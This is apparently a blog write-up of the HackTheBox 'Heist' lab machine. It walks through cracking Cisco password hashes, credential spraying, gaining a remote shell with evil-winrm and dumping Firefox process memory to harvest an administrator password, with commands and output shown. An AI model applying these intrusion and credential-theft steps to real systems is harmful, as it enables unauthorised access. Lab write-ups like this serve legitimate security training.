Heist - HackTheBox

Information gathering

Let’s start with a port scan:

$ nmap -A -T4
Starting Nmap 7.80 ( https://nmap.org ) at 2019-10-30 14:36 EDT
Stats: 0:00:31 elapsed; 0 hosts completed (1 up), 1 undergoing Service Scan
Service scan Timing: About 0.00% done
Nmap scan report for
Host is up (0.20s latency).
Not shown: 997 filtered ports
80/tcp  open  http          Microsoft IIS httpd 10.0
| http-cookie-flags:
|   /:
|_      httponly flag not set
| http-methods:
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
| http-title: Support Login Page
|_Requested resource was login.php
135/tcp open  msrpc         Microsoft Windows RPC
445/tcp open  microsoft-ds?
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: -1s
| smb2-security-mode:
|   2.02:
|_    Message signing enabled but not required
| smb2-time:
|   date: 2019-10-30T18:37:11
|_  start_date: N/A

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 82.67 seconds

As always, when there’s a web server, that’s the first thing that I look into, and there’s a login page:

Given that we can login as guest, let’s do it:

It looks like someone needed help with the configuration of a Cisco router and asked for help, it looks like it’s username is Hazard. Let’s check the attachment:

version 12.2
no service pad
service password-encryption
isdn switch-type basic-5ess
hostname ios-1
security passwords min-length 12
enable secret 5 $1$pdQG$o8nrSzsGXeaduXrjlvKc91
username rout3r password 7 0242114B0E143F015F5D1E161713
username admin privilege 15 password 7 02375012182C1A1D751618034F36415408
ip ssh authentication-retries 5
ip ssh version 2
router bgp 100
 bgp log-neighbor-changes
 bgp dampening
 network mask 300.255.255.0
 timers bgp 3 9
 redistribute connected
ip classless
ip route
access-list 101 permit ip any any
dialer-list 1 protocol ip list 101
no ip http server
no ip http secure-server
line vty 0 4
 session-timeout 600
 authorization exec SSH
 transport input ssh

Straight off we have three passwords hashes. The secret 5 type can be cracked with John the Ripper, so after writing it to a file, let’s run john secret5 --wordlist=rockyou.txt. After a couple of seconds, we find out that the password is stealth1agent.

The other two hashes can be decoded simply with an online tool, like this one, so here they are:


Further exploration

As we have a username and some passwords, we can try to authenticate to the smb server:

$ smbclient -L \\\\ -U 'hazard%stealth1agent'

        Sharename       Type      Comment
        ---------       ----      -------
        ADMIN$          Disk      Remote Admin
        C$              Disk      Default share
        IPC$            IPC       Remote IPC
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to failed (Error NT_STATUS_IO_TIMEOUT)
Failed to connect with SMB1 -- no workgroup available

Out of luck, because of the order that they are written in the file, the first one works!

We can use lookupsid from impacket to enumerate users in the Windows domain:

$ ./lookupsid.py
Impacket v0.9.20 - Copyright 2019 SecureAuth Corporation

[*] Brute forcing SIDs at
[*] StringBinding ncacn_np:[\pipe\lsarpc]
[*] Domain SID is: S-1-5-21-4254423774-1266059056-3197185112
500: SUPPORTDESK\Administrator (SidTypeUser)
501: SUPPORTDESK\Guest (SidTypeUser)
503: SUPPORTDESK\DefaultAccount (SidTypeUser)
504: SUPPORTDESK\WDAGUtilityAccount (SidTypeUser)
513: SUPPORTDESK\None (SidTypeGroup)
1008: SUPPORTDESK\Hazard (SidTypeUser)
1009: SUPPORTDESK\support (SidTypeUser)
1012: SUPPORTDESK\Chase (SidTypeUser)
1013: SUPPORTDESK\Jason (SidTypeUser)

Getting a shell

We can now try to login with all usernames and passwords combinations that we’ve found. There’s a handy metasploit module that can help us. After writing all the users in a file called users and the passwords in pws, let’s load the module and set the options:

And let’s run it with exploit:

Cool! We’ve found the passwords of Hazard and Chase! Now we can use evil-winrm (install it with gem install --user evil-winrm) to check if one of the two users is allowed to get a remote shell:

$ evil-winrm -u Hazard -p stealth1agent -i
Evil-WinRM shell v2.0
Info: Establishing connection to remote endpoint
Error: An error of type WinRM::WinRMAuthorizationError happened, message is WinRM::WinRMAuthorizationError
Error: Exiting with code 1

No luck with Hazard, let’s try with Chase:

$ evil-winrm -u Chase -p 'Q4)sJu\Y8qz*A3?d' -i
Evil-WinRM shell v2.0
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Chase\Documents>

And we got a shell! Let’s check the flag:

*Evil-WinRM* PS C:\Users\Chase\Desktop> Get-Acl user.txt
    Directory: C:\Users\Chase\Desktop

Path     Owner             Access
----     -----             ------
user.txt SUPPORTDESK\Chase NT AUTHORITY\SYSTEM Allow  FullControl...

Privilege escalation

Listing the files in the Desktop, there’s a curious one:

PS > type todo.txt
Stuff to-do:
1. Keep checking the issues list.
2. Fix the router config.

1. Restricted access for guest user.

Following the usual enumeration techniques and listing the running processes with Get-Process, reveals us that there are some instances of Firefox running, which stands out among the others. The first thing that I did was to search in the user AppData folder for Firefox data like bookmarks, visited URLs and things like that, but I had no luck with it.

The next thing that came to my mind is to dump the processes memory with Procdump. After downloading it on our machine, and moving it in the same folder that we launched evil-winrm from, we can upload it using it’s upload command:

Now we can dump the Firefox process memory using the PID from the Get-Process command:

Because I’m a PowerShell noob, I’ve downloaded the dump on my machine to analyze it, with download firefox.exe_191129_053757.dmp and after (quite) a bit of time I started searching for strings.

An interesting string to find in the memory dump would be password, so let’s search for it:

$ strings firefox.exe_191129_053757.dmp | grep -i password
"C:\Program Files\Mozilla Firefox\firefox.exe" localhost/login.php?login_username=admin@support.htb&login_password=4dD!5}x/re8]FBuZ&login=

Bingo! And we can get a shell with these credentials:

*Evil-WinRM* PS C:\Users\Administrator\Desktop> Get-Acl root.txt
    Directory: C:\Users\Administrator\Desktop

Path     Owner                  Access
----     -----                  ------
root.txt BUILTIN\Administrators NT AUTHORITY\SYSTEM Allow  FullControl...

And we have access to the root flag!

Wrapping up

I have to admit this one took me quite a bit of time, even though it was only 20 points, because I went down the AppData folder rabbit hole, and there were some cache files and a password database that looked interesting. This is the first time that I’ve analyzed a process’ memory, which is an interesting technique.

Thanks for reading!